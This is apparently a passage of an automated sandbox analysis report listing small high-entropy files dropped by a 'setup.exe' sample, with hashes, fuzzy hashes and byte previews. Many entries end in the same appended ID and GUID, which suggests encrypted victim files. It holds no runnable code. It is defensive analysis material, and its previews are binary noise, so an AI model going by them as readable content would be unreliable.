              Preview:<?xml.p..<As.7...F4.MQiy..6w..T..x.(.O.E|..._.g..K..%...>.xK...~.CF:.....t.....;.%96..?...~X`.h[..hzNL3$,...{V.(X.....r.....0..*.m..t..S.....UF.5...).>7..(Q...x......o...:<.p.?.t...._...<(..?.....?..#.&0.I|.l.[.hl....g"..Ph.....L.....CL...c.l>...G.D`...._ .e^...-.:,.......:9.[)........u.5.f.;....N.C...uwu..h.2.......k........@....A.....x.....(...cy..d.....Ns*..8.#U../.....z.&i.b.=.0...-\.g..E.o_s+..:1W..G.KV'.|U.,...>.:..H]Gh...Z....[..p,.O.(.%..=M.7z.-..;.. ...Q$2...9._...uz..j1OK=..a......b ;c......z...J./._.4.C.....t.t7{....4..b(.S.....Az[.B;..s.....?L.*$sX?.1..GV..r.....8,&F.5vc........v..d.`L..u8;....).4i......ZW.n.+.g.y$..D,(.;....1.a..)*...~.....V.(.]$.P.....A>s.s....:.p..z6-.c8.).p....!..,u4.[e...w[bY.C.....kJ.u..s......R..H"bI..!.L.4.....!...=..]y.R.72'..@Iw...`j....;..T*1D2.k....y.Z..H.Z..f..@F>e..*..(p....E..@.].Qan..~....R.j+W..jv....Gym...&(g.?I...Bu.Q..D...\.O.R....p...5...l;].wY,..b.Qb..W..n..2..ei.p...h..l..F......]J.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2924
              Entropy (8bit):7.937369761185222
              Encrypted:false
              SSDEEP:48:CGYPFWJs8Ri9wP2ALRHP9Ul2BhnJdldiqi2pKMp08r/9HhffGmJ2XvkJ1ZQRD:CG/eVALRHVMoNVWRE/C4ZQZ
              MD5:67980CFE498FBF579626B764461C58FB
              SHA1:44C7C1190CA10B90084828A01F8EA4AD36AEE5B9
              SHA-256:6F6440ED566872DB78A1EDB72A7F12D9CD58C98F7B9E2BD24B1CB56274A71FF1
              SHA-512:76C19F4A8D926054DC305552B150E5A645E882609BF4970BE04C122A3F12B379954496FE807F841E6DDF563CBE6358EE464DAB4FBC48DA5E0A6097BCA94B5535
              Malicious:false
              Preview:<?xml,..@T.$.../.n.I=6{..Y...v.I.iK.Yr....q...n;F...'!.7...t.:.J.^s.....kT.D.......).(..)X....''..mX<%Z...E\..n...b..P....,q#..:...)<Z...;>X..Ds...G...A...*...|...B.................r.\WQ...b.....b...t..h.c..n.....L.......-!..m.X.J...~ (!#...[|.a.K..Ce..v.....Q.>./".+..N.D..V....|[..Z...6.+X.H..n,KG..|....(.l.....N..z..q....\q..t....V:.X..z..2..~.~D...P..{$..^.....0.b.O.,..........M....`....Dh...l..\?tEK...?..Y..'..tl..n....EF...N.......Y.#5.".4.U..B.m.......q_..;....X.....CS.......!..Z........g.g.O..l(%.....tl#.....L.J..........xC;q@8.#..d.....L..i'...H]6......q!..%.....$Q9\N..%RY.86.C.G...B.|&...q..<.P.q.P.2S...t....]..o...=S@.fVR.p.%t....#vr....V.....G.9..p0o.e..Q..=.p..\R'0At.........)*`m.P.P.`.2..O...W.[Y...\..........H>.|.G.."I....|l*..z.O..4._...f...t5.az}..s*5_Y..r..'.u.$.];&\..)...k........A...._..X..F-e+.<..i..h..|......[..@.A ..a..c...;.MF./.Y.,.i.I.....{.OG0X..+....X...=...9.O.Ix.o8V<...MY.......#...S*.p.Rg.Kn&.|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2461
              Entropy (8bit):7.922040635950204
              Encrypted:false
              SSDEEP:48:SOlyv4q8U6hPSRacoK1FrveIxN73eflatxqwKj6noFzEZ1ah2w7sYPSD:rQ4qDoK1F7j/ONa/qwKtFwOhpsYP6
              MD5:697A4961ABD10A4532425F860F9B6686
              SHA1:92153C2657E6FC7D08222B0A13821878A7966ECA
              SHA-256:C109B08BB42C4F569A07AEF793E8185AC9EC7D1046F8F1E042EFCA0FE7AAC1E3
              SHA-512:F5726ECA946FCEC96D9D04F2438C4F9223E4003F1CAD93F610CD69B8207440825DA81D220D2B9A856C67F1FFBC1C135670953D538DA3AEBFE98C9EB17D58C39E
              Malicious:false
              Preview:<?xml....u..fE...{....[...}..2..J.q...yW...k.$M.8a........g.....=...;..."..[d..]f..J#...)E.7WkS>M..}...h..N....B......)=.....5...U.u[.f;P..]0.......-...%..@V.m.@......)....a.c..H.~....y0.,H..T.....K...%.s.{..m.b.. 1D.....T...=cv...9.....y.:.d|...O.d.JR.M]........x..f.`.......J..o.w.>0..K/y4>.....h4.5^-..w.-Rj...._..|-...vP...4.m...#v|.C...n.b;.%b...<..L8i.?Dz<.U....2.....B..G..S.}[....d..2..-.yq.\.....;..4...>..<...;x..8HV....uM.:**z .lw....?......zG.bi9I*.._......w.....9.S{)......q2.{D.<..1....t..l.St.q...T.Ot.....mW.>E......@<=.*...x:.u..yPc9.../g....0..Z...c...F.\...Vj:.e.:g9C_...tyx.!.....E;.......l..V#"..".L ..Z.!..=..7....].,....{.c..Im...Z>`^g.(...L`...V...;.kD.V.}l\|>..V.Qm.lQK........>...-.`nTCu?..@......R8L...B..U..#0..)..=..xZk...@T.{.....a.....g29..*.......:T^f0....P%.^x......#.....Qz.r.<..JX....oE.K../..\PE;....._...l...R....g,...Clu..rp..,.qG.;8.D.y.Am.Q....I.r..M6..v.$F.A..6.K/P..}...f.m...\..*_D.1.....1....$L....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):758
              Entropy (8bit):7.732775145908101
              Encrypted:false
              SSDEEP:12:WWrVwUkVZSJG3d8RIzlKt2/VajWIWtbFcrQoKsnmOFFek+WsYM+XD+lXElREXp5O:WhVQOzluYajWrTcrQojmOF1Fc0laX8TX
              MD5:F6A0B92B9E6CC3F881F1EB0B8D6DD6F8
              SHA1:1ADA9BB05C3793E8E699127CF3E1B03D47DFC775
              SHA-256:46024E6922107F82C5636272601EF9FE31CD2C0BACDAEABBDB04560DE32CC453
              SHA-512:1F31FF982F9B35DE05A5CD78BAEB7C3005B9EA87004CBDCF5A8FB108C3BF87CBE92DA1CB25E3BD723B89F93F146B5888106F1FD0DE1538C6F90A479129C99D69
              Malicious:false
              Preview:<?xml......q.gF.ll\x.].lc...+..Y....6W.._...|^f...rx....N...8".jp...Y...r|?\0.WR...1.....d..=@.".<K.O.....ee...S..&....R5...&..d.-...t... .X<..V.I...1....A.2J.wi...r....(..t.....K.]....r...O..665.Z.n.....p.o..RZ...P.h.....l.....`!.6....u..&..h.S7.*o._....\|.Av...nJX...i....s..~..S.,..\.r.P.J_............{.v....c+...........oz.tA.5......iN..v#.e6....qi..t.........{.C.~.)..}Y.=.Ian.2`...Eou.p..L.DMo......P.Y=.H..WnMuz....$mV. .).....(../....M.....;>c..=.s.8...j."&.....!..BC.(s..d.0.|..../J..j.O..r..vF..v...".b.#.jut..G+.4r..X..!..FKW....{....Y......`...f."E.v..~....a..t6.c..-..2Y._.^..YdgCGX.....*>>.L.o....9Q.b.....M....&.a.p.....0..D...q...(VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1210
              Entropy (8bit):7.833991639469542
              Encrypted:false
              SSDEEP:24:AKsIfCfSl2PpM9RSNxb6ZDFNmkG750/af2AcwpYfHaDRLmdivDY88mCiKmI8bD:AKsIfCfSloYYwWd0C+Av0Ha5rvDbCi/N
              MD5:D1882EA9C0F9B6C0624416792F235B93
              SHA1:5B404940CD856D85813FC3CB8C18EBD181FEE601
              SHA-256:F6D92E701F50C5EC7AD0C2C837B29BFD6BCEB9437BCF26BD9FF437BD24200AAF
              SHA-512:5B59D3A2E2690BE969431BD83416BDB4A11E1A196B7A32259754E4F7A3BE8C5A6FE2EFD0F0AE5C7188103C2C53756A60CB636EED75CB77EE1028D38A8FE82BBD
              Malicious:false
              Preview:<?xml.`Y.s.[...p.N...(:..=..}..w......qdz0<...@.......C....^...C...0;...#....m...<8u...6.`u;6..6 .?..W........[..Y..:X.y5..8.....bL...*L..oF!f...T.DX.M\z.TW..HAmd..2..}n'../J.ny........Q.N...m..j...5.R.9.....h6..~V.{&*m.&7..G2.=#.B..p".92../.A^".L....jOn...9_...~.c.WaIH&p?}.(.U..a.....F.<.\.ii..&.S..R..5!:..e....W.Y.KMCT..;..R....EI[..".xW.d%.f.o.....y...~......{..:.6u.*.....B.Q.;..J...YoE....,C..o_\...7,...B*...K.\..r...t.).:....r....J...f.b.bw....xF..{.~b......rA.~.jP..V ...!.../o...!..7.b`....%...n..=1......^n...T...m&.O+?..`Xr\..qa..Zz...+...;1..!...we....G..wu....}..37g....2{.'.1;r...so...:...Y..}k`...wL>.qS.;.!.GP...'..i...T..\.....(.p.{......D4.^u...*...qW...9...~..KA.<..:f....W..UoG...F...f...9...8.9mefT..T.7..6.o.x.~..........g.r..F.....,.).J.,..C5...P.|/xR.pj.r.."1....*..fJ.....c.[tP....8.@..T.....,~.-.ah.4o.....|.T]{.hH.Kd2.........&.........yrP...3....R)78.)..\#.....z.t.D....2..LL...}0BoD.$."....2..O.-...1.'...V.I'.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):537
              Entropy (8bit):7.487445366210089
              Encrypted:false
              SSDEEP:12:OUphkW6EPLo8NaDZHnKYsOYFX7KYqHjbtOXQsMR2cii9a:OULk6c7DZqYDYXMDbtWpbD
              MD5:AF3C47ACCC23BFB56799BC3B46F87042
              SHA1:9ADCBD07AE660BE963C66C00458721CB51CADF70
              SHA-256:2BC7E6651A35F075068CC4829787847BF0B129166BB71CDE60F614E46F66F3D5
              SHA-512:DAF5B1C34810BEB174D276FFA73BF858A242063036FF2CB534837F9784D289A208A489B9C89D78DCE19E21F37DA6C59896E20960F92CDACA3D4A2C50B93F77FD
              Malicious:false
              Preview:<?xml{.......HP..E.`.T{..(j..0.t.SNc.].H@.z./.k...R..6....t2}......73(R.qHz.+..J.".a..........f.{.6..,.Lp.......<.....A...8.e......@0.....y..gN6.............N....CI..J9......J.H....[(.....X...a.....H..j..t..\.....D..8ee.ov...}.H.q$...!.#..>.].....T<......n.=\m.?.Q{f..{..A..'.%.yGn.{..E.....H.0.JeL....E.....|EQ..j..-......Dm....>.9cr..`....i..R..:...\.5...#j...N...M.=....I..6..B..%L.R..`mI.7...4E..1..\.....?...XC+./....]..]..]l.8A(d.l..U:..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2493
              Entropy (8bit):7.9186191019782335
              Encrypted:false
              SSDEEP:48:c3H96YkGHjnq/ntmeGHL2MKuDWc/4++5Bx3oECuwhsx+j+d2PxJnqEztnweD:c3d6L+jq/MH7DWc/gV3aGxytznDztwm
              MD5:64305C93443FDCF8B9AFA7F08F2C8BF1
              SHA1:ABD8B7F80ADE36B9EA2941D07BB36C0757DE6219
              SHA-256:BDB437E9CED2958200622280CA2D77135CC8D87F5032C3DF1C2836DEF6E32BBF
              SHA-512:C11FD851A211C7CBA149AED2CBC8C91395DDA04493B41BDF7EC2159A8F7044F5E476D438305C31A33A69FEBF1E1B184349F1FE2368A5FCF97AE35F3E047931CE
              Malicious:false
              Preview:<?xml........z.7.&...V.u..7...jRJ....0%.,C.}.........?Afkq.....w_..iE...f..W....j....S>...O;....Y.....eLO0...(..2.YD.!..{.x}.'2F.....B..'vI..I0.....<...\.d......kS.P..'o#.[.f-.....0.............E-..].g.d..X....T{.}.i_..a.]I.*...'.z...{.N..Z.\....u..H..q".b|e..D.-~Dl(.....Z.+.Q.m.j..1....u".N../.........t.$q..!8S~.N+|.....:......W.^.h......AR.4..C.Y.=%p)I....G...M....._..y....7L...(5.d...W..[.*.].:....._. J....P......,.....d..u...>.D...s.....`.K9P.D.......%....!J?...\Y.....g.9e#lCZ-.B.........g.z..D......;.[..X/uy.....ggT.G..'M......*/....O.,D.i.E.O....2..}z.6..9/.K%..)..on....Z..~b.7j|=....3W.......wa.W..`.B.k.|.._.)..;'I.#.q.....I#.B....n...a..TV.t.\..,..>..tu..#F.p.UZ.b.../.g....$....~..Af..u....Y..I.....K./V...fkO..Du..[..4..O.....IL.y.^z..Udd5..!i......%..$.....o3F})\..rd-..`........HY..#........o.!.d.4...:.p'.`..../..D.w.Q...$5b.m.......r.. .a^.}.9E.k......9....0..'...rnV.p's#h'.wx-..s....I.d.Q..^...7.....$..?y.#'.t.7$>I.D}u.h..q..:1.`..#....j2
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):741
              Entropy (8bit):7.699609543649894
              Encrypted:false
              SSDEEP:12:XqtuxWLV6Tc7BsUExfDSfPBu5i/GnjEOadzAtKvO82W9ywdR3s5iDuLQzIon5sMS:X9xWcTc72d9DCJu5znjEdzAtKvODAygg
              MD5:DDE5D1FF008B81A4B7460D0903EC22F7
              SHA1:062B003D855D5FC3439DB7C0E8051C9CAF3B9CEA
              SHA-256:EFCEB1CD4A021590378381AAE32C32D9BC9DDC54D81781DFEF4F17C655D40721
              SHA-512:D46339FD4F2C7B569854BA8AD472FD90ED6C2FAA3178AEC3EC0F05FAEBE45586F064A447CD68A17166C8C242AF1E82967FB0813981051A850155D7B533C198D6
              Malicious:false
              Preview:<?xml.....M..;...c.|.........._9[....E..:..m..[.AWA...F..+..;..FC...f7.1..vu.U@.<.m..Q..t/.=]..M*1.vL..|y..aJ..4.4._.l9....X5..A...N.....y...."8...i.U..._.q.{..2E.=.u}|y..jjDc........Z.zjvz,".g.y..f\......E..|..Y.|..d..1.zPL....r."X..2p..`..\BT.B......_#.....z.[B...{R8f!b!."g....H.=m...I.W....r.tl$......d...hG.n....5".O....G....$..N......,g........W...".a....>.F,.#..9&.z...4c....h.I..g.H.c.%...<...!.v.B7.8. ;..&......N+.P.!.N.2..<..;[G.....>..c+.?..g..no.$.01.I..L. x<..s.....=.n...%....."g.c(...1....&;.~.I..J'_W0.U.r............... ...{..D...A@..\v.<.....8=.q..W.n.k.H[q.y...!0W.Y... .e....-.Np/..M...9....X..S~........... ...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.730428594577371
              Encrypted:false
              SSDEEP:12:KnTXDbRhGY+DnBEaZfb2JwJlrssBAayN5Dlm8dRJxgV4lshjIsMR2cii9a:+bSY+FEa4JwJeSyNdljTr/shdbD
              MD5:FA65CE5124B7969472A1A9BFFC5CC0E1
              SHA1:24C43D0DE7AA07FFC6F817C3DA887B49308CA998
              SHA-256:8BA4C2380DF4501C161D197586B9756E703239AB33DB0E637C426DC1F23C927F
              SHA-512:9D97B64F767503496C2F97674D9AD36E6C1E102FD7D3E5B4C3D31A333028549CC598C4E6CF1111E2926BA2C57DBB5FCC7B0D7D3BCC6DC3ED1C3417B68D671886
              Malicious:false
              Preview:<?xml..;...~U....e..uEQt.W...Tg- ...%...w9-2sl%.}...XK.u.._..(.:.TH=...a.4..2....,9.e>c............#.....v...wO...<..9..x!.n{).T+.i..tE&..D...h.....mo.3n......._....S...j{)>.gL#Xv.e..A....H.O.sb2.#._c+.d.U.O.....n.X:..j..lEZa.2..C|u...l.A..2.{....Z...........|........E.:+......w..rd..T....D..<*A...&..j..>.m}.....C8..j."BM2S.b.....5.,..,S<. R.sIJ....|.......h.M.R..?..E....'.Lk.v.J...N...)b...<C6LZ. ..!E|..[F,7B....N..?y..J%.E...?.Y4..I.'|........,9.q;......`..d.`..r.....J.7MgC#[..f3r...E..A...6.$.UM../<*..#w...)........Zr<9.(.u..#.....M...~`...jj.~.....l..h...h..F`4..b..~....J.)!eV......2E......C.!.g.~o...s&..W.._VQ....c...#....yH.q......o...Z.n.&....B...mt.]h....>.u...{-t...!.+...09VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.717630389403284
              Encrypted:false
              SSDEEP:12:T5MIYel1SYbXOBeJjh2m3vjJ+AyTl3TDucQ6idZDLURJbjAH6Z+QsMR2cii9a:9MI5HTu84m3vdpddLURJY6Z+pbD
              MD5:8B1D15D5D3BF9BFFFEDFC3B79B7F5DD9
              SHA1:679B43AEDA00A2C69C04C02EDDDC123D83448F79
              SHA-256:5E98FE5FCEFBF96B9836D1C57656DCE4013DF4AB279E1939A1AD260EFBEEA836
              SHA-512:DC5B9529DE680488A386CD7238F23E9193049AADF451917A8FEE1C7CD76AACB673EC0ADBB5E29A8C5F2DF50FE4D8A02D6152D2DC3DA100F4B4CAEE191AA4D4F0
              Malicious:false
              Preview:<?xml...OL}.]..$s"...._.._UB..'.?A.u:..._/.. .j.{.1x.^..H..#..Y....8.>q.b...H;G.P.E.a.r)@..V<a.Z.G.@.0 .h.{.n5..v....t.*..ks........>lU..%..[.am.iG.o.k......a.b..&}.U....n.....A....Bs_.....(o..b[yo....y..<..;.;5......R..z..g.<lt..z.R4.H.h5^..........x...NdEkk.U.!&.m.3.o.u.,..&DwA<..(*:.9D.g..'.E.4.uaM.J....:...EEm....G.....c.OR...\.....9A....z]....$.U..Z.m.H..<.f..ApV....P.u...he..6&S...dse.......{f!....H.....q]......BP..@....d.~...g.M..|...ra.3.~.....Z.vw..u..;.O.1/ie.E3.....`...JU.d...R;.mG.o..ug:..-.....=y.\R.e<.....{..b#5...6.....U.j=.....z..L..YR...,..X.Q.h.%..{ZO.#....![...(`.. w1.*Rs.2..)%.d.c....[c.,.....~X..9k...K"..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.704864089665267
              Encrypted:false
              SSDEEP:24:ZGlN+sRMToRu2Q6F8IIc2hPoOFjenkc2xgcvbD:ZyN/BJI5PbkMjD
              MD5:0FF370A7DF895B08065ECA32E82614BF
              SHA1:A2C9FEDF3DFA01790A510FF9F61EE420C1F9F1A4
              SHA-256:94B78E439C73B62CBC5A4E31CF20A2C6767B345010279F2E6C72C2FD494A5619
              SHA-512:91674D9E4E2FD139CCD635DE32A97D544917560A058030D8EF1DE072D869F4B4007705185AFE376088ECF4679FB27B623758B30F4571A9078177CEB04C56D4A3
              Malicious:false
              Preview:<?xml<'.B.......dR.^8b.|..G.J8..*4.8q%.....j..wm.._y...`q..e............xf.;.q]n.^..#.u.........o.LU......4.YhJ6;...<.sf.9....!u:/..;x..l..wi....f..^k..[....o\.......hk.. .......?v`+.P..n(..4.}.|.=..../.}.Ef...}.....A uE8..X2.O.9**b+...."...Q.R.]wg.....!|Tg[6v....'N6...Z..,...D...*.q.W .R-...I:f........I..s.&.(..z+5,T.....{p.../..]6.......:.l#...=..#~...0...b.O..8.iU..!e.NAy .J:I.y.'G!.4(.....F...nYOQ0.6!3.c...WZ..<t-u.kk..It.&Vp.....5.Kc..^7.z.hf......T...OE....P.c\S.#}........U.".L..z....}..."[..[......(.'..w.z.?.b.Q.M...B0..%...mp/..B...../..y8Y.....*.[.?.&...[.N0.s.....o.....zMS?.....v.XX#i/5q'yAY.ZcA...0s.a8.....?...E..;5........0z.6R.".=5.Rr`.....D...{..N...*..zk...[..........VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):965
              Entropy (8bit):7.794602460029411
              Encrypted:false
              SSDEEP:24:gDILgcXILtzg6KPWB4nm9x8cN+TBdrmAjrcS2gme0YbD:gIBIRzg6KPG4nm9x8c0Vdi+rcS2E0CD
              MD5:DA41DA25F61FD326FFF7753AEEE7F825
              SHA1:2E50200372BA2CEA9B1907D1B9AF883DC0EF6142
              SHA-256:5C467C560FF5693DFA354A260DE074146D210E691DB6452F929DAAF7C7298161
              SHA-512:74BC4E47F6EA4A14910E502D97E1CA12F8FAEEF920714AACC80B1FE9AE238604B3CDAE207196AB3F2C9792926007A4AC589A40F3359888DDB0C26A1D7350B1CF
              Malicious:false
              Preview:<?xml.z..b.Oa..cVyp..j`....F...]E............7....U"ueM.v.iZ.}@f;|.(*.tb...[...a.J....d..pIO\o .^.....b.^.f..9.fE /.*.1...P.v.J....+...@T"..Dl!Rd.;L.MR..~...t.Q|.<E.(...r.7.O@....>...5..........7jC.J+u.^.9...S....|.D...qzd=s.T...1!"x..}&......^v.wj...i.J.].0#.c'..T.?......./.$W".......!....>|..N..... .......K.B......=.......7...;.}..%...v.[h.1G....).....o;P.......XxW.....Z...v....V..u...X...w S..c..n......_.n.@.!...T.......\...P..T.Z.W.}0.s....-.(....U..S.._4...5...Z.......; .C*B..&..H..$. h?F.K8%.)&VSq.xq=..2..zt .].....v.i..)..3:....*.~.f.[.j.F......`i..RKO.Z.v.o.Z^L.E..f$.\...%..W.)re..1...J...F0..d3./'.........E..GPx..U...W'....N.....M..g..n.6hRc-..~..qz'.Q6..|.q@.........1.-....G.....V?(\..Lz..7.C.;.yx[.....!Db..5..... '/......../~.....,....U.....Z.....9_.?.gB...$..Wk'....IQ.2 ..]..N...E;....."=.+.=.8...w,.Ok.vfT.<`..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):800
              Entropy (8bit):7.729562653202849
              Encrypted:false
              SSDEEP:24:AgaP/RjC8aMX9CLm/ywVQ4/x0uRzFYiWTnVbD:AgiOsYeDV70czXWBD
              MD5:28C346C5B85236A8A6CB767D5156BADE
              SHA1:313816E815E97097A5D581C0F6F7CD31A8BA9BB6
              SHA-256:6D9ADF70A60EFABB82F15E2B8D433D31FC27BDF76E9E19A0E9231757329B57C4
              SHA-512:3E3A32774F9AA054063436699F1DECD15927AAB92E59186C85B0BDC5CD9CA11F7D73B838A7EBC67D69B9E9B09AE5EF13F5053FB4759751CB879FA1B0BF04E74C
              Malicious:false
              Preview:<?xml4X...W.(S[..f..^.....J..!....>.;c..Fy..w.N.PKXB.~...C.0..._......"R....G ...N......]M;;.-.]....*{.."....X..h.3.....)2.&.|.9z....H.p{...,.q./.^.......A...;..0...-;..T.1?..{.C.w#.6.`.o2^..... ..A.G...J...M.~.9ny..(.J...B.....#I..N..a.PB.-..u....;e...ag...B..<..Ub....v.q.U..~,.....^.h....2Z.^X..M.e+..{.......9nD.........@..`...M.p.L.s...V.... E.>......T..V....Dz.G.......=....Lx......r....r.q@.f..._=.N.<..7.OM..g.H..+CH...:...].l.J......7Jw.R0Hp...PVh..#I@....1.b^`.6."._aG.]p....e.......L.hzui..MF...[2..P`;c.........6.7u\.+P.T....M.Mf.{B.....".m..'.eU...Q....a...B...R.'t.c;..r....y.&.....*,.)....DY...._g...0....D..>.G..V.=.nP.3.(...?...Z..n.8.*.....k.J.:A.@>.75....Q.._..*.%VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.667172955656235
              Encrypted:false
              SSDEEP:12:0C/dJdntuhNUk6sD4bEZynGaPL7LJbXcibi4H8bIh+zGFKVslzwQ7pZVmmm0BACt:H/mcVEAPSbbBK8sWQ7pZY10RhdlbD
              MD5:B254B0ABC54AF3AA000EAC40725E6FF6
              SHA1:98E337A4DF52B8619D5BB668A33504086EE22DFE
              SHA-256:C2FB8F9C2646EF3E3FACFABAE8C97047B5D1FEDA9381D3D395B5DF6FC963B2C7
              SHA-512:DE43421566699076D7CF55D35D29ADA2968B96EA02F4B5971054B9F4DA4DA475760238FC2A4229847423F314BA0AFB0C471E3E2680ECEA467A3EBBFDA327A8DA
              Malicious:false
              Preview:<?xml..:}3.J........h..$vi..'R9....#....|....N.!!.......(.d)#.....aT..z....<Hg.1b.H..nv.<~..4.....en....&.:.........t....}._MU.....R[...........'.F`ox;...ij\^+.T2.P].jr..v.2..Z.S..C8 .....5...L.B.+..*..%......$a.*k.*.s$..J9c.C..BO.S.b..g..t;.#.B.z..\..%...N.....b.<..mM..!.dIXQ.....Z..5OW.e.0.^1T.eq0f....dS-hS....b...........O....t.h....A...z..o..MVwq..)..hY}..<.R;. ..#....T>...F$...`../......\Y}L.k...~.....lbO.....?....2....NrV.{........ 4q.Yz......>r.|.nGM..;gd~yPE.i.YV!.2.j..{...UF..h.c4N....<.?TG..d.^j....N..q..w...........a..7.r.......E..g..E.4Et....N..?.!t.2._...v...U.X..N..(."..0qA~.|I_..~`....!a!.$.<..l.....[.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.709439875048564
              Encrypted:false
              SSDEEP:24:3Krxb6XHvxqpCPnKOfIRkbN2LTQ1i25nQl85bD:3Kl6fx6cKOgWbN23Qo2i85D
              MD5:F353A58491DB686AFA581C6D3DFD2C54
              SHA1:A5B1AF17A6627848E2E2B00B0C8C5CD3F1D2ED2A
              SHA-256:000B2E35B7B8FBDE17F1A9041CB9C5B072FCF87422DF9CCFEB5C063CAAFDD0CB
              SHA-512:ECD9C2D031312E33B045C88E79672FEA5E530BECB37161064173E4CF1889EEC49CFE62FB84168C8BBAD52A0EEC271E79D8E362C562A4D6EA1E84A66724289AEA
              Malicious:false
              Preview:<?xml.O.!...%c%.....r...Um.m...."2...t..(...$s~....t..z.....p.oX.8.3...cI....-..ig.......F....M...5.`.......X._..!..].{q.=..^....6h].V..jC3.}[..!bT(n.Z..-..j.IG..(...#gU4..c.Lb...Xo.5:.$.B..3.".i...z...."pU`.. ..xWxp....kwJ..s&...#..7f.J.W}.e...y%7.mz3~...l...c.R...f."....J}.....7\..........UFH5~l.....j...p.:....v...w....I.....$IT..+G/.....+..9U|..-.Ii...P.@(..f.K. ..`.e...q..%.7...J.....W.d..5N.>...w..io....+tz.R..I...;...<..>L..-....E.....Q..&..g#Q=.2.=......8.....L.!.2oE.....Q;.......0FWl|.....U..#J|(.h.D..bQ.......Yu..Q.y_../.gs.N.O.x.,q.>n.I.x..$.........i.u.......<a.^i..?+.sH.......p!I.I.6A.i?..6.J3.4.X#m....[i?....1=...c.Bm..x.Z...-qU..._.2..kaIl:.!#..5.`.0.......`..$.r} ..2..k...}.@Q......h..ko9.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.71550517310955
              Encrypted:false
              SSDEEP:12:c4ti9HMbKxcU1EUq9x2l45pIKjB/K2QF8nWQRHRUzU0rP4ngb4m6JNVbUOYXGNHX:esbKeUCD9IAXjB/KUnWQRCzU0rP4gb4J
              MD5:ABDF364D1F0ED77E2D7930A819642143
              SHA1:157890E07B225CCB700EAF4A52CCB4D5B0601085
              SHA-256:C7CD36A9FB3C23A7EAF9164738E22A96C554A6126B994E288402D24BDDBE4E2B
              SHA-512:522B335E690EBC2618C92C62BD0B593B60EA776FC3C5B90064CAEE35A7423678670D0A998C4F2098037528620E09DA64ADFA47B2C8E95C686B099E2B9EAF73DB
              Malicious:false
              Preview:<?xml.'......29jh~.....p.._..#..X.<....k.....Dm._&..V.3...........&..-..T.>..rc.X...+GP.k.I...{a..;.....c.Z.T7'...oCjk[.Yz..U..p....O.`.).m...."..'.u......1!......ks.h.*..~j..}>/n..S...}.0.G....AE;..5.g........i.q..G.0..!.I.^.+=u%g...'_.......*...n.r....n.3"5`vY..$..g$...d....... .Gy....M.tp.0. ......(.Y..tLo..P[oy{..K|.*...4....-..+,..Mw..zW .@..E[...u. ...}..+...;.g...\OB.U..G.m..z...+J..W.e..;..t2w2P@..b.o..Uri.9q+..y0u.h.c.^an.k.{.!.o...4...v...\D"..C[".j........jdu,.pWe!.zx.I......[....e..;..d@L.)........QL.]hL.k.G.....0l.IZ...s.+.@O..Ks..Q.xq.C...%...2{~.6...H{t`...r".....%...[....E..W...e.HC....;..h.9.E.k."..-$....Q...SF}..4..c.W6.M.=........VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.757317894855538
              Encrypted:false
              SSDEEP:24:hKq/bt3+e7s5uncPYOKFKyolAbIM6024k/yYG0JNNWbD:hx/pue7sscPYOKgyo2bIM6X4iGRD
              MD5:F2FB28103F940FABECF25C1A32002744
              SHA1:8A96901F9E263C2AB32194872D0554C4ED6DF5FA
              SHA-256:033FF0A6396A2F82E19A39D9FE558B1CD42258048DCDDE4D2CF9FEB44101936D
